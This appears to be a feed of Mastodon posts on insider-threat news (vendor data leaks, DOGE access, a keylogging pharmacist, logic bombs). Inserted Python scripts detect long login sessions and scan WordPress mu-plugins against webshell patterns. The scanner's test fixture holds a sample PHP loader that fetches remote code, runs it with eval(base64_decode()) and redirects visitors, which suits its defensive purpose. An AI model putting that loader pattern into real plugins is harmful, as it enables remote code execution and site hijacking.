#Insiderthreat

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-05-24

York County, Pennsylvania incident:

An employee of a vendor that had been hired to develop software for York County Civil Courts was provided “with certain York County Civil Courts data to use for software development and testing purposes. The employee subsequently left the vendor’s employment without returning this data,” according to the county's press release.

So it seems they gave the vendor's employee REAL data to use for development and testing -- with "contact information, Social Security numbers, driver’s license or state ID card numbers, financial and medical information"

And of course, there's no evidence of misuse, but they have referred the matter to law enforcement.....

h/t, pennlive.com/news/2025/05/cent

#infosecurity #govsec #insiderthreat

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-05-22

Today's reminder of the #insiderthreat

Some great reporting by Jason Leopold about how an insider incident at govt contractor #Opexus was the root of a massive federal #databreach

Original source: news.bloomberglaw.com/tech-and

Nonpaywalled source: insurancejournal.com/news/nati

DataBreaches.net had reported on the Akhter twins' arrest and conviction for an earlier insider breach back in 2015. Link to past coverage of them: databreaches.net/?s=akhter

2025-05-22

Opexus, which is owned by the private equity firm Thoma Bravo and provides software services for processing US government records, was compromised in February by two employees who’d previously been convicted of hacking into the US State Department.

insurancejournal.com/news/nati

#Cybersecurity #Insiderthreat

Stratosphere Research Laboratory (@stratosphere@infosec.exchange)
2025-05-15

A warm welcome to Acalvio Technologies as a Silver Sponsor of The Honeynet Project Workshop 2025 in Prague! 🐝

Acalvio’s leadership in cyber deception aligns perfectly with the workshop’s mission. If you're a company exploring deception technologies or advanced detection strategies, don’t miss the chance to connect with Acalvio during the event—they’ll be available for a chat throughout the workshop.

📅 June 2–4, 2025
🔗 prague2025.honeynet.org/

#Honeynet2025 #Deception #insiderthreat

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-05-06

Today's reminder of the #insiderthreat

"A 43-year-old Laguna Niguel, California man pleaded guilty today in U.S. District Court in Seattle to wire fraud for his scheme to steal nearly $1 million from his employer, announced Acting U.S. Attorney Teal Luthy Miller. Paul Joseph Welch was the IT manager of Kent, Washington energy manufacturing company Algas-SDI when he used various schemes to steal more than $950,000 from the company. Welch is scheduled to be sentenced by U.S. District Judge Jamal N. Whitehead on August 21, 2025."

Read more of the DOJ press release:
justice.gov/usao-wdwa/pr/calif

#fraud

Geekoo (@geekoo)
2025-04-30

A cybersecurity CEO was arrested for planting malware in hospital systems. Insider threats to critical infrastructure are more real than ever.

geekoo.news/cybersecurity-ceo-

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-04-24

Former Disney employee who hacked Disney World restaurant menus in revenge sentenced to 3 years in federal prison:

justice.gov/usao-mdfl/pr/winte

He got off pretty lightly considering he tampered with the allergy information on food items that could have caused life-threatening allergic reactions in some people.

#insiderthreat #revenge #infosecurity

Nonya Bidniss (@Nonya_Bidniss@infosec.exchange)
2025-04-18

ICYMI: Deep dive into whistleblower Berulis' claims.

"Within 15 minutes of DOGE accounts being created…Attackers in Russia tried logging in using those new creds. Correct usernames and passwords."
#InsiderThreat #DOGE #infosec #natsec #espionage
Thread: bsky.app/profile/mattjay.com/p

2025-04-16

Ugh, this is more than a month old and I missed it.. the registration of a DOGE LLC

#fedramp #microsoft #doge #aws #insiderthreat

open.substack.com/pub/cyberint

Nonya Bidniss (@Nonya_Bidniss@infosec.exchange)
2025-04-16

Share with people who may not be that aware of what Musk's #DOGE rats have been doing inside the people's protected data systems. Thank you #Harvard University for putting this online.

"Could my data be used against me?

Yes, and the risks are both immediate and long-term. In the short term, unauthorized access has already enabled targeting of individuals for harassment. For example, some employees of the United States Agency for International Development (USAID) have been “doxxed,” i.e., had their personal information released publicly, after DOGE accessed personnel files. Federal workers are reporting fear of political retaliation, with FBI officials particularly concerned about the targeting of those perceived as disloyal to the administration. While these examples involve federal employees, the data DOGE is accessing could enable similar attacks against many Americans who do not work for the federal government. Leaked data could enable identity theft, financial fraud, or targeted harassment."

#coup #corruption #infosec #InsiderThreat ash.harvard.edu/resources/unde

Nonya Bidniss (@Nonya_Bidniss@infosec.exchange)
2025-04-15

"members of the DOGE team asked that their activities not be logged on the system and then appeared to try to cover their tracks behind them, turning off monitoring tools and manually deleting records of their access — evasive behavior that several cybersecurity experts interviewed by NPR compared to what criminal or state-sponsored hackers might do." ... "If he didn't know the backstory, any [chief information security officer] worth his salt would look at network activity like this and assume it's a nation-state attack from China or Russia," said Braun, the former White House cyber official. ... In the days after Berulis and his colleagues prepared a request for CISA's help investigating the breach, Berulis found a printed letter in an envelope taped to his door, which included threatening language, sensitive personal information and overhead pictures of him walking his dog, according to the cover letter attached to his official disclosure. ... "If the underlying disclosure wasn't concerning enough, the targeted, physical intimidation and surveillance of my client is. If this is happening to Mr. Berulis, it is likely happening to others and brings our nation more in line with authoritarian regimes than with open and free democracies," wrote Bakaj, his attorney
#DOGE #corruption #infosec #cybersecurity #InsiderThreat #coup #natsec npr.org/2025/04/15/nx-s1-53558

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-04-05

And here's another reminder of the insider threat if you don't investigate your employees' or consultants' backgrounds and claimed credentials carefully enough. @briankrebs has the story and how a number of criminal cases may now be appealed or overturned:

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe:

krebsonsecurity.com/2025/04/cy

#insiderthreat #fraud

Dissent Doe (@PogoWasRight@infosec.exchange)
2025-04-05

Today's reminder of the insider threat involves a pharmacist in Maryland who, over a period of 8 years or more, used keyloggers and installed spyware on about 400 computers at the University of Maryland Medical System so he could spy on female co-workers in private moments at work (such as changing clothes, breastfeeding their babies), and in their homes. He was reportedly fired in October 2024, and was able to get another job in another healthcare facility in Maryland because there have been no criminal charges filed against him yet and UMMS apparently didn't alert his new employer.

If Maryland law is like my state's laws, the hospital may be barred legally from revealing what happened if asked for a recommendation by the new employer. And it seems the Maryland state pharmacy board can't just suspend a license unless there's been a conviction, so the failure to have criminal charges filed already seems to have put more potential victims at risk.

Unsurprisingly, a potential class action lawsuit has already been filed against UMMS with six plaintiffs so far. There are estimates that there are more than 80 victims of the now-former employee.

Some of the media coverage on the case: thedailyrecord.com/2025/04/04/

#InsiderThreat #keylogger #workplace #privacy #infosec

ICYMI 7 Feb 2024 "A US Treasury Threat Intelligence Analysis Designates DOGE Staff as ‘Insider Threat’" www.wired.com/story/treasu... #InsiderThreat #cybersec #crypto #finance #Risk


Opalsec (@Opalsec@infosec.exchange)
2025-04-01

The North Koreans and Russians have been busy, Insiders abound, and attacker tradecraft continues to evolve!

Catch all this and more in our latest wrap-up of the day's news:

🗞️ opalsec.io/daily-news-update-m

There are a few noteworthy stories to get across - here's the TL;DR to get you up to speed:

🕵️ North Korean Infiltration: This is way bigger than many think. DPRK nationals are landing jobs inside global companies, gaining privileged access ("keys to the kingdom" level!). DTEX reports active investigations in 7% of their Fortune Global 2000 clients, and CrowdStrike notes nearly 40% of their NK-related IR cases involved insiders. They move fast post-hire, pivoting to supply chains and installing RATs disguised as onboarding. Watch out for highly anomalous login behaviour (like days-long sessions!). Rigorous remote hiring checks (camera on, resume checks, comms style) are crucial.

🎣 ClickFix Tactics by Lazarus: The infamous North Korean group is evolving its 'Contagious Interview' campaign (now dubbed 'ClickFake' by Sekoia). They're targeting crypto job seekers (shifting focus to non-tech roles too!) with fake website/document errors ('ClickFix'). These prompt users to run PowerShell/curl commands, dropping the 'GolangGhost' backdoor. Watch out for lures impersonating giants like Coinbase or Kraken. Sekoia has shared YARA rules – definitely worth checking out.

💻 WordPress MU-Plugin Abuse: Bad actors are getting stealthy by hiding malicious code in WordPress "Must-Use Plugins" (wp-content/mu-plugins/). These execute automatically on every page load without activation, making them hard to spot. Sucuri is seeing redirects to fake browser updates, webshell backdoors fetching code from GitHub, and JS hijackers replacing content or links. Keep those instances patched, clean up unused plugins/themes, and lock down admin accounts (MFA!).

Check out what else happened in the past 24 hours, and subscribe to get each edition straight to your inbox:
📨 opalsec.io/daily-news-update-m

#CyberSecurity #InfoSec #ThreatIntelligence #Hacking #DataBreach #Phishing #Malware #WordPress #NorthKorea #Russia #Ukraine #AI #SecurityCopilot #GRUB2 #Bootloaders #InsiderThreat #DataProtection #CyberAttack #infosecurity #cybersecuritynews #ClickFix
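The DPRK-insider item above points at days-long interactive sessions as the login anomaly to hunt for. The following is an added example, not code from Opalsec, DTEX or CrowdStrike: it pairs login/logout events per user and source, flags any session longer than a threshold, and also measures still-open sessions against a supplied "now" so an active multi-day session is reported rather than ignored. The log line format, usernames, IPs and the 16-hour threshold are all constructed for the illustration.

```python
"""Flag abnormally long interactive sessions from login/logout events.

Added example; the "<ISO timestamp> <event> user=<name> src=<ip>" format,
the sample users and the MAX_SESSION threshold are constructed here.
"""
from datetime import datetime, timedelta

# Constructed sample log (not real telemetry): one normal working-day
# session, one session spanning more than two days, and one still open.
SAMPLE_LOG = """\
2025-03-30T08:02:11Z login user=alice src=10.0.4.12
2025-03-30T17:31:40Z logout user=alice src=10.0.4.12
2025-03-28T22:15:03Z login user=contractor7 src=203.0.113.9
2025-03-31T06:40:55Z logout user=contractor7 src=203.0.113.9
2025-03-31T09:00:00Z login user=bob src=10.0.4.20
"""

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
MAX_SESSION = timedelta(hours=16)  # assumption: a working day plus slack


def parse_line(line):
    """Split one log line into (timestamp, event, user, src)."""
    ts, event, *kv = line.split()
    fields = dict(f.split("=", 1) for f in kv)
    return datetime.strptime(ts, TS_FMT), event, fields["user"], fields.get("src")


def find_long_sessions(log_text, now=None, max_session=MAX_SESSION):
    """Return [(user, src, start, duration)] for sessions longer than max_session.

    Events are sorted by time first, so out-of-order log delivery does not
    break the login/logout pairing. A login with no matching logout is an
    open session; when `now` is given it is measured against that instant.
    """
    open_sessions = {}
    findings = []
    events = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    for ts, event, user, src in events:
        key = (user, src)
        if event == "login":
            open_sessions[key] = ts
        elif event == "logout" and key in open_sessions:
            start = open_sessions.pop(key)
            if ts - start > max_session:
                findings.append((user, src, start, ts - start))
    if now is not None:
        for (user, src), start in open_sessions.items():
            if now - start > max_session:
                findings.append((user, src, start, now - start))
    return findings


def suspicious_users(log_text, now_iso=None):
    """Convenience wrapper: sorted, de-duplicated usernames worth a closer look."""
    now = datetime.strptime(now_iso, TS_FMT) if now_iso else None
    return sorted({u for u, _, _, _ in find_long_sessions(log_text, now)})


if __name__ == "__main__":
    for user, src, start, dur in find_long_sessions(
        SAMPLE_LOG, now=datetime.strptime("2025-04-02T09:00:00Z", TS_FMT)
    ):
        print(f"{user}@{src}: session from {start:%Y-%m-%d %H:%M} lasted {dur}")
```

Session length alone is a weak signal (build servers and long-running RDP jump hosts produce it legitimately), so in practice the output is a triage list to join against HR data, source geography and the onboarding-period activity the post describes, not an alert on its own.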

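For the mu-plugin item above, the practical check is simply to read every file in wp-content/mu-plugins/, because WordPress loads each top-level .php file there on every request with no activation step. The following is an added example, not Sucuri's tooling or WordPress code: it scores each top-level PHP file against a constructed indicator list (dynamic code evaluation, decoders, remote fetches, shell execution, request-driven code paths, redirects, silent user creation) and reports files over a threshold. The two sample plugins it writes to a temporary directory are constructed for the demonstration, and the weights and threshold are assumptions to tune per estate.

```python
"""Triage WordPress must-use plugins (wp-content/mu-plugins/) for
webshell, redirect and remote-loader indicators.

Added example; indicator regexes, weights, THRESHOLD and both sample
plugin files are constructed here and are not real payloads.
"""
import os
import re
import tempfile

# (name, regex, weight). Weighted so one dynamic-eval plus one remote fetch
# or redirect crosses THRESHOLD, while a single lone match does not.
INDICATORS = [
    ("dynamic-eval", re.compile(r"\b(eval|assert|create_function)\s*\(", re.I), 3),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2),
    ("remote-fetch", re.compile(r"(file_get_contents|curl_init|wp_remote_get)\s*\(\s*['\"]https?://", re.I), 2),
    ("shell-exec", re.compile(r"\b(system|shell_exec|passthru|exec|popen)\s*\(", re.I), 3),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I), 1),
    ("redirect", re.compile(r"header\s*\(\s*['\"]Location:", re.I), 2),
    ("silent-user", re.compile(r"wp_(create|insert)_user\s*\(", re.I), 2),
]
THRESHOLD = 4  # assumption: anything at or above this gets a human read


def score_source(src):
    """Return (total weight, [indicator names]) for one file's source text."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def scan_mu_plugins(mu_dir, threshold=THRESHOLD):
    """Return {filename: (score, [indicators])} for top-level .php files at/over threshold.

    Only top-level files are scored because that is what WordPress auto-loads;
    a loader file that require()s a subdirectory will itself show up here.
    """
    findings = {}
    for entry in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, entry)
        if not (os.path.isfile(path) and entry.lower().endswith(".php")):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            score, names = score_source(fh.read())
        if score >= threshold:
            findings[entry] = (score, names)
    return findings


# Constructed benign sample: a one-line hardening mu-plugin.
BENIGN = """<?php
/* Plugin Name: Disable XML-RPC (constructed benign sample) */
add_filter('xmlrpc_enabled', '__return_false');
"""

# Constructed malicious sample: remote loader + eval + conditional redirect,
# modelled on the behaviours described in the post; not a real payload.
MALICIOUS = """<?php
$c = @file_get_contents('https://raw.githubusercontent.com/example/example/main/x.txt');
if ($c) { eval(base64_decode($c)); }
if (isset($_GET['r'])) { header('Location: https://example.invalid/update'); exit; }
"""


def build_sample_dir():
    """Write the two constructed samples into a fresh temp dir and return its path."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    for name, body in (("disable-xmlrpc.php", BENIGN), ("zz-cache-helper.php", MALICIOUS)):
        with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return mu_dir


def demo():
    """Scan the constructed sample directory; only the loader should be reported."""
    return scan_mu_plugins(build_sample_dir())


if __name__ == "__main__":
    for fname, (score, names) in demo().items():
        print(f"{fname}: score={score} indicators={','.join(names)}")
```

On a live host, point scan_mu_plugins at the real wp-content/mu-plugins/ path and treat any file you cannot trace to a deliberate deployment as hostile regardless of score; the scoring is there to prioritise reading, not to clear files. Pair it with a file-integrity baseline of the directory, since these files change rarely by design.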
SecPoint (@secpoint)
2025-03-27

youtube.com/watch?v=rI7_MF9gO6s

🕵️‍♂️ How to Detect Dark Web Leaks with SecPoint Penetrator
Find out if your sensitive data is being leaked or sold on the dark web —
✅ Comprehensive dark web scanning
✅ Detailed reports in .txt, .html, and .pdf
✅ 100% on-premise for full data privacy
⏱️ Results delivered within a few hours

🔐 Stay ahead of cyber threats before they strike.

2025-03-12

Man found guilty of planting infinite loop logic bomb on ex-employer’s system - Davis Lu had planted malicious Java code onto his employer's network that would cause "in... bitdefender.com/en-us/blog/hot #insiderthreat #guestblog #law&order #logicbomb #malware
